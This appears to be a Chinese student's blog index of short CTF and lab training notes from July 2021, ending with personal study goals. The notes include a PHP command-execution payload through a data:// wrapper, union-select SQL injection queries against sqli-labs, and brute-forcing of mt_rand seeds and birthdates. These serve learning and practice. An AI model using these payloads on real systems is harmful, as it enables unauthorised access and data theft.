实训7.7
2021/7/7 命令执行web38 题目提示:nginx的日志文件/var/log/nginx/access.log 替换 1url/?c=data://text/plain,<?=system("cp fla*.* 1.txt");?> url/1.txt 得到源代码
更多
实训7.6
2021/7/6 sql注入sqlmap使用需要python2.7环境 需要python时说明python2或者Python3 输入python sqlmap.py+命令行 sqli-labsless-1字符型注入 url/?id=1' order by 4# 直接输入无效就用url编码(要构造#闭合) url/?id=1%27%20order%20by%204%23 依次尝试 验证有3列 获取数据库名称 url/?id=' union select null,database(),3# 获取全部数据库名称 url/?id=' union select null,(select group_concat(schema_name) from information_schem..
更多实训7.5
2021/7/5 爆破入门可爆破 密码 目录 web25mt_rand() 随机种子爆破 通过运行脚本https://www.openwall.com/php_mt_seed/(在这下载的) 脚本下载了不会用…… 为什么传参有时候在cookie里有时在url里 web27【题目】爆破生日 如果用火狐浏览器,burp不能直接抓到这个页面的数据,需要在谷歌浏览器里复制请求头 爆破方法: 脚本 1234567891011121314151617181920212223242526272829303132333435363738//遍历日期<?php//621022********5237 $myfile = fopen("zid.txt", "w") o..
更多目标
GOAL web 入门题目 做好笔记 扇贝 python做下去 sql教程 https://www.w3school.com.cn/sql/index.asp php教程(自己找视频吧毁灭吧) 基础知识(翻书 实训平台) 东西好多啊 干一点是一点吧 需要提高的能力 脚本能力 运用工具(老忘记自己工具放哪了别说开始用了 救命 整理一下) +++ 123hello Hildegarde.Your goal is to get off the life's hamster wheel
更多